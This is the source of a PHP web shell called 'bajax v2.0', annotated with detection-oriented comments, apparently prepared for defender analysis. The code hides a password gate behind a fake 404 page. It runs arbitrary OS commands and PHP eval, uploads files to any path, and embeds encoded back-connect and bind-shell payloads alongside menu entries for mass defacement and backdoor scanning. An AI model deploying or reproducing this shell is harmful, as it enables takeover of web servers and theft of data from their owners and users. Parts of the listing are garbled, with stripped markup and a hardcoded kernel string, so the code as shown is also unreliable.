// Resume or create the PHP session; the login gate further down stores its
// "authenticated" flag in $_SESSION.
session_start();
// Lift the script execution time limit; '@' suppresses any warning from the call.
@set_time_limit(0);
@clearstatcache();
// Turn off PHP error logging and error display, so failures inside this script are
// neither written to the PHP error log nor shown in responses.
// Defender note: a run of '@ini_set' calls that silences logging at the very top of a
// file is a useful static indicator for webroot and file-integrity scans.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);


/* Configuration */
/* Password using md5 hashes */
// Unsalted MD5 digest that the login gate compares against md5($_POST['pass']).
// Defender note: the literal digest can serve as a content signature for this sample.
$password = "6a684f2c9a41df2c963a1ee7d17ce2a0"; //mrmad
// The next three settings are not referenced anywhere in the visible part of the file.
$default_action = "FilesMan";
$default_use_ajax = true;
$default_charset = 'UTF-8';
date_default_timezone_set("Asia/Jakarta");
/**
 * Emit the decoy login page and terminate the request.
 *
 * The markup imitates an Apache "Not Found" error page (heading text, "The requested
 * URL was not found on this server.", and an <address> line built from the Host
 * header). It also contains a password input named `pass` whose background and border
 * are styled white, so the field blends into the page. The function ends with exit.
 *
 * Defender note: a response that looks like a 404 page but carries an
 * <input type=password name=pass> element, or is served with a 200 status, is a
 * practical detection point in response-body inspection and web-server log review.
 *
 * NOTE(review): the PHP close/open tags and the surrounding form/head/body markup
 * appear to have been stripped from this listing, so the body is not valid PHP as shown.
 */
function login_shell()
{

<!DOCTYPE html>
<html lang="en">


<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">




Not Found


<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at =$_SERVER['HTTP_HOST'] Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>


<input type=password name=pass>





exit;
}
// Login gate. The session flag is keyed by the MD5 of the request's Host header, so an
// authenticated session is bound to the host name the client used.
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
// Accept the request when the MD5 of the posted `pass` field matches $password.
// The digest is unsalted and compared with loose '=='.
// Defender note: POST requests whose body is just `pass=...` to an unexpected .php file
// are worth alerting on in access logs or WAF telemetry.
if (isset($_POST['pass']) && (md5($_POST['pass']) == $password)) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
// No session flag and no matching password: serve the decoy page, which exits.
login_shell();
}
}

//error_reporting(0);
// Second session_start() call; a session was already started at the top of the file.
session_start();
// Buffer output from here on; downdb() later discards this buffer before it sends
// its download headers.
ob_start();
$name="bajax v2.0";
/**
 * Single class that holds the whole tool: page rendering, file-manager actions,
 * OS command and PHP-code execution, an in-memory ZIP writer, and a MySQL client.
 *
 * NOTE(review): the class body continues past the end of the visible listing.
 */
class bajax {
//public $dir;
public $name="bajax v2.0";
// Buffers used by the ZIP writer: local file records and central-directory records.
public $datasec = array();
public $ctrl_dir = array();
// ZIP end-of-central-directory signature ("PK\x05\x06") followed by two zeroed 16-bit fields.
public $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
// Byte offset at which the next local file record starts; add_dir()/add_file() store it
// in each central-directory entry and then advance it.
public $old_offset = 0;
public $find;
public $ip;
// The properties that follow ($favicon, $xback_pl, $xbind_pl, $xback_c, $xbind_c, ...)
// hold long encoded strings. Their names suggest embedded helper programs tied to the
// "Back Connect" menu entry -- TODO confirm by decoding them in an isolated analysis
// environment; the code that consumes them is not in the visible listing.
public $favicon="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";
public $xback_pl ="dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0=";
public $xbind_pl ="bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1NWzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5Wikvo+hjUoV7Dvky3ZfgI=";
public $xback_c = "XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJWUnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B";
public $xbind_c = "dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEOc7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0ORwe4uPZdVXswVu4D52f3OkJUu9BxLJJ/qXWfqcNbiuCHfJWrFvaGR2ys/Ak/MZqkgXlfw==";
public $xmulti_py = "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";
public $wmulti_c = "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 ? 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";
/**
 * Build the page head: title, favicon link, inline stylesheet and a server banner.
 *
 * When the request carries a `fav` query parameter, the base64 string in
 * $this->favicon is decoded, sent as image/png, and the script exits. Otherwise the
 * method returns an HTML string. The banner exposes $_SERVER['SERVER_SOFTWARE'],
 * get_current_user(), the address the Host header resolves to, the client address,
 * and the output of $this->drive() (defined outside the visible listing).
 *
 * The method shares its name with PHP's built-in header(); the unqualified
 * header(...) calls inside it resolve to the built-in function.
 *
 * Defender note: the page title "bajax v2.0" and the `?fav` favicon request are
 * stable strings to search for in proxy logs and cached responses.
 *
 * NOTE(review): the line that starts building $r and the last line of the banner look
 * damaged by extraction (a stray `$this->name` token, and a literal kernel string
 * where a call presumably stood); the listing is not valid PHP as shown.
 */
function header()
{
// favicon
if(isset($_GET['fav'])){
$data=base64_decode($this->favicon);
header("Content-type:image/png");
header("Cache-control:public");
echo $data;
exit;
}
$r='';
$this->name $r.="<!DOCTYPE html><title>$this->name</title>";
// The favicon link points back at this same script with the `fav` parameter.
$r.='<link rel="SHORTCUT ICON" type="image/png" href="'.$_SERVER['SCRIPT_NAME'].'?fav" />';
$r.="<style type='text/css'>
body {
background:#222;
font-family:Tahoma,Verdana;
color:#fff;
font-size:12px;
}
#wrapper {
border:thin #f00;
margin:10px auto;
padding:20px;
-moz-border-radius:10px;
-webkit-border-radius:10px;
-border-radius:10px;
background:#010107;
}
#head {

border-bottom:thin solid #f00;
padding:7px;
line-height:1.3em;
}
#menu{border-bottom: 1px solid #f00; padding: 5px; text-align: center; margin-bottom:15px;}
#menu a{padding: 7px 10px; color: #fff; font-size: 13px; font-weight:bold;font-family: arial; text-decoration: none; }
#menu a:hover{color: #f00; text-decoration:none;-moz-border-radius:4px;-webkit-border-radius:4px;}
#center{
border:1px solid #f00;
font-size:12px;
padding:10px;
-moz-border-radius:10px;
-webkit-border-radius:10px;
-border-radius:10px;
text-align:center;

}
#center table {
width:100%;
font-size:12px;
margin:0 auto;

}
#center td {
border-bottom:1px solid #f00;
padding:5px;
margin-bottom:10px;
}


#center #input {
border:1px solid #f00;
width:400px;
border:1px solid #f00;
-moz-border-radius:3px;
-webkit-border-radius:3px;
background:#000;
color:#fff;padding:3px;
margin-left:10px;
}
#center #input:hover {
background-color:#f00;
}
#center #cmd {
width:700px;
border:1px solid #f00;
-moz-border-radius:3px;
-webkit-border-radius:3px;
background:#000;
color:#fff;padding:3px;
}
#center #cmd:hover {
background:#f00;
}
#center #pos {
border-bottom:1px solid #f00;
text-align:center;
padding:5px;
}
#pos textarea {
height:100px;
width:500px;
margin:5px 0 5px 0;
resize:none;
}

#isi {
border:1px solid #f00;
-moz-border-radius:10px;
-webkit-border-radius:10px;
-border-radius:10px;
margin:10px auto;
padding:10px;
color:#fff;
padding-bottom:15px;
line-height:1.5em;

}
#isi textarea {
line-height:1.5em;
border:none;
background:#000;
width:100%;
height:300px;
margin-bottom:10px;
font-size:12px;
color:#fff;
border-bottom:1px solid #f00;
resize:none;
}
#isi input:hover {
color:#f00;
}
#footer {
font-size:12px;
text-align:center;
}
.xpltab {
font-size:11px;
color:#fff;
font-family:Tahoma,Verdana,Arial;


}
.xpltab th {
background-color: #f00;
padding:4px;
opacity:50%;
border-left:thin solid #000;
}
.xpltab th:hover {
color:#fff;
}
.xpltab td {
border-bottom:thin solid #f00;
border-left:thin solid #f00;
padding:5px;
}
a:link,a:active,a:visited {
text-decoration:none;
color:#f00;
}
#box {
border:1px solid #f00;
width:200px;
border:1px solid #f00;
-moz-border-radius:3px;
-webkit-border-radius:3px;
background:#000;
color:#fff;padding:3px;
margin-left:7px;
margin-right:7px;
}
.tengah {
margin:0 auto;
display:block;
font-size:14px;
}
hr {
line-color:#f00;
}
#but:hover {
background-color: #f00;
}
#but {
height:25px;
background:#222;
color:#fff;
padding:3px;
width:70px;
border-radius:4px;
-moz-border-radius:4px;
-webkit-border-radius:4px;
border:none;
margin-left:7px;
}
#but:active {
position:relative;
top:1px;
}
#col {
margin-left:7px;
float:left;
line-height:2.4em;


}
#val{
margin-left:20px;
float-right;
margin-bottom:7px;
}
#sqlbox {

border:1px solid #f00;
width:1000px;
border:1px solid #f00;
-moz-border-radius:3px;
-webkit-border-radius:3px;
background:#000;
color:#fff;padding:3px;
margin-left:7px;
margin-right:7px;
}
.gede {
font-size:20px;
margin:0 auto;
color:#f00;
}
</style><div id='wrapper'><div id='head'>
".Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64."<br />".$_SERVER['SERVER_SOFTWARE']."<br />".get_current_user()."<br />Server Ip : ".gethostbyname($_SERVER['HTTP_HOST'])."<br />Your IP : ".$_SERVER['REMOTE_ADDR']."<br />".$this->drive()."</div>";

return $r;
}
/**
 * Resolve the working directory for the current request.
 *
 * If the `dir` query parameter is set and names a directory, the process chdir()s
 * into it and the raw parameter value is returned. If `dir` is set but is not a
 * directory, no return statement is reached and the result is null. Without the
 * parameter, the method returns getcwd() plus a trailing directory separator.
 *
 * Defender note: the path comes straight from the request with no base-directory
 * check, so every file action built on this method reaches wherever the web server
 * account can read or write. An `open_basedir` restriction and a low-privilege PHP
 * user limit that reach.
 */
function dir()
{
if(isset($_GET['dir']))
{
$dir =$_GET['dir'];
if(is_dir($dir)){
// Changes the process working directory as a side effect of every call.
chdir($dir);
//$dir = $d;
return $dir;

}
}
else {
//return realpath(isset($_GET['dir'])).DIRECTORY_SEPARATOR;
return getcwd().DIRECTORY_SEPARATOR;
}
}
/**
 * Render the top navigation bar as a row of links.
 *
 * Each entry maps a label to a query string carrying an `act` value (file, mysql, ser,
 * encode, bc, write, bds, md) and, for most entries, the current `dir`. The labels
 * include "Back Connect", "BD Scanner" and "Mass Deface"; the handlers for those
 * actions are outside the visible listing.
 *
 * Defender note: the `act=` values listed here are concrete strings to hunt for in
 * web-server access logs when scoping an incident.
 *
 * @return string HTML fragment
 */
function menu ()
{
//options menu
$r='';
$menu=array("[ Files ]"=>"?act=file&dir=".$this->dir()."", "[ Mysql ]"=>"?act=mysql&dir=".$this->dir()."","Info.Ser"=>"?act=ser&dir=".$this->dir()."", "Encoder"=>"?act=encode&dir=".$this->dir()."", "Back Connect"=>"?act=bc", "Writable Dir"=>"?act=write&dir=".$this->dir()."","BD Scanner"=>"?act=bds&dir=".$this->dir()."","Mass Deface"=>"?act=md&dir=".$this->dir());
$r.="<div id='menu'>";
// Note the swapped names: $val holds the label (array key) and $key holds the URL.
foreach($menu as $val=>$key)$r.="<a href='$key'>$val</a>";
$r.= "</div>";
return $r;
}
//create new directory
/**
 * Create a directory named by the posted `dir` field under the current directory.
 *
 * The unqualified mkdir(...) call inside resolves to PHP's built-in function, not to
 * this method. The posted name is appended to the path without validation, so it may
 * contain path separators. Returns a status string, or nothing when `dir` is empty.
 */
function mkdir()
{
if(!empty($_POST['dir']))
{
if(mkdir($this->replace($this->dir()).$_POST['dir']))
return "created, Refresh Please";else return "Permission Denied";
}
}
/**
 * Build the main control panel shown on the file-manager page.
 *
 * The remaining text shows five sections: "Command", "PHP Eval" (a textarea named
 * `eval`), "Create Directory", "Create File" and "Upload File" with a "Save To"
 * destination. Each section originally posted back to the current directory.
 *
 * NOTE(review): the <form> and <input> tags and the `$this->` prefixes appear to have
 * been stripped by extraction, leaving unbalanced quotes; the string below is not
 * valid PHP as shown.
 *
 * @return string HTML fragment
 */
function center()
{
$r='';
$r.='<div id="center"><div id="pos">
dir().'">Command
</div><br /><div id="pos">
dir().'">PHP Eval <br /><textarea placeholder="//don\'t include php tag" id="cmd" name="eval"></textarea><br />
</div>
dir().'">
Create Directory :
dir().'">Create File :


<div id="pos">
dir().'" enctype="multipart/form-data">Upload File <p /> Save To dir().'"><br />
</div></div>';
return $r;
}
/**
 * Run a string as an operating-system command and return whatever it printed.
 *
 * Tries system(), passthru(), exec() and shell_exec() in that order, using the first
 * one that function_exists() reports, and returns "All function Disable" when none is
 * available. The command string is passed through unmodified.
 *
 * Defender note: listing these four functions (together with proc_open and popen) in
 * the php.ini `disable_functions` directive makes this method fall through to its
 * final return. Child processes spawned by the web server or PHP-FPM user are also a
 * strong host-level detection signal.
 *
 * @param string $r command line to execute
 * @return string captured output, or the fallback message
 */
function execution($r)
{
if(function_exists('system'))
{
// system() writes straight to output, so it is captured with an output buffer.
ob_start();
system($r);
$s=ob_get_contents();
ob_end_clean();
return $s;
}
elseif(function_exists('passthru'))
{
ob_start();
passthru($r);
$s=ob_get_contents();
// ob_clean() empties the buffer but, unlike the system() branch, leaves it open.
ob_clean();
return $s;
}
elseif(function_exists('exec'))
{
$s='';
exec($r,$h);
// Output lines are concatenated without re-adding line breaks.
foreach ($h as $hasil) {
$s.=$hasil;
}
return $s;
}
elseif(function_exists('shell_exec'))
{
$s=shell_exec($r);
return $s;
}
return "All function Disable";
}

//output command
/**
 * Handle the "Command" form: execute the posted `cmd` field and render its output.
 *
 * The output is placed inside <pre> without HTML escaping. When `cmd` is empty the
 * method sends a redirect to the file view; the built-in header() returns nothing, so
 * the `.=` adds no text to $r.
 *
 * Defender note: POST bodies with a `cmd` field sent to a PHP file are a direct
 * indicator; request-body logging or WAF rules can surface them.
 *
 * @return string HTML fragment
 */
function command()
{
$r='';
$r.='<div id="isi">';
if(!empty($_POST['cmd']))
{
$r.="<pre>".$this->execution($_POST['cmd'])."</pre>";
$r.="</div>";
}
else $r.=header("location:?act=file&dir=".$this->dir());
return $r;
}
/**
 * Evaluate a string as PHP code and return the output it produced.
 *
 * Output is captured with an output buffer, which is then discarded. The code runs in
 * this process with the full privileges of the PHP runtime.
 *
 * @param string $c PHP source without the opening tag
 * @return string captured output
 */
function seval($c)
{
ob_start();
eval($c);
$h=ob_get_contents();
ob_end_clean();
return $h;
}
/**
 * Handle the "PHP Eval" form: evaluate the posted `eval` field via seval().
 *
 * Runs only when both `submit` and a non-empty `eval` field are posted; the captured
 * output is HTML-escaped before display. Otherwise a redirect header to the file view
 * is sent.
 *
 * Defender note: an `eval` POST field carrying PHP source is a high-confidence
 * indicator in request-body inspection.
 *
 * @return string HTML fragment
 */
function phpeval()
{
$r='';
$r.='<div id="isi">';
if(isset($_POST['submit'])&&!empty($_POST['eval']))
{
$r.=htmlspecialchars($this->seval($_POST['eval']));
}
else $r.=header("location:?act=file&dir=".$this->dir());
$r.='</div>';
return $r;

}
/**
 * Store an uploaded file in a destination directory chosen by the request.
 *
 * The multipart file field is `berkas` and the destination comes from the posted
 * `tujuan` field. The stored name is the destination concatenated with the
 * client-supplied file name; neither the directory nor the name or type is checked.
 *
 * Defender note: the field names `berkas` and `tujuan` are distinctive in multipart
 * request logs; new or modified files under the webroot shortly after such a request
 * deserve review.
 *
 * @return string|null alert() markup reporting success or failure
 */
function upload()
{
if(!empty($_FILES['berkas']))
{
$dest=$this->replace($_POST['tujuan']);
$name=$dest.$_FILES['berkas']['name'];
if(move_uploaded_file($_FILES['berkas']['tmp_name'],$name))
return $this->alert("uploaded");else return $this->alert("failed");
}
}
/**
 * Create an empty file named by the posted `file` field.
 *
 * The path is built from `$this->dir` -- a property read, not a call to dir(); the
 * visible class declares no such property (its declaration is commented out).
 * Only the existence check is guarded by the `!empty` test: the two `if` statements
 * nest without braces, so the fopen() below runs on every call.
 *
 * @return string|null alert() markup, or nothing when the file could not be opened
 */
function createfile()
{
if(!empty($_POST['file']))
if(file_exists($this->replace($this->dir.$_POST['file'])))
return $this->alert("file has exist");
// Opening in "w" mode creates the file, or truncates one that already exists.
$fp=fopen($this->replace($this->dir.$_POST['file']),"w");
if($fp)
{
fclose($fp);
return $this->alert("file Created");
}
}
/**
 * Close the wrapper elements and append the footer line with the current year.
 *
 * @return string HTML fragment
 */
function footer()
{
$r='';
$r.="</div></div><div id='footer'>Copy Left Bajax ".date("Y")."</div>";
return $r;

}
/**
 * Return the banner block shown as the tool's logo.
 *
 * Only the text "barudak jaringan komputer" remains inside the <pre> element in this
 * listing; any surrounding art appears to have been lost in extraction.
 *
 * @return string HTML fragment
 */
function logo()
{
$r='';
$r.="<pre>

barudak jaringan komputer



</pre>
</div>";
return $r;
}
//go up directory
/**
 * Return the parent of a directory path that ends with a separator.
 *
 * Splits on DIRECTORY_SEPARATOR and drops two elements: the empty one produced by the
 * trailing separator and the last directory name. implode() is called with the array
 * first and the separator second, a legacy argument order.
 *
 * @param string $d directory path ending in a separator
 * @return string parent path with a trailing separator
 */
function up($d){
$s=DIRECTORY_SEPARATOR;
$d=explode($s,$d);
array_pop($d);
array_pop($d);
$r=implode($d,$s).DIRECTORY_SEPARATOR;
return $r;
}

/**
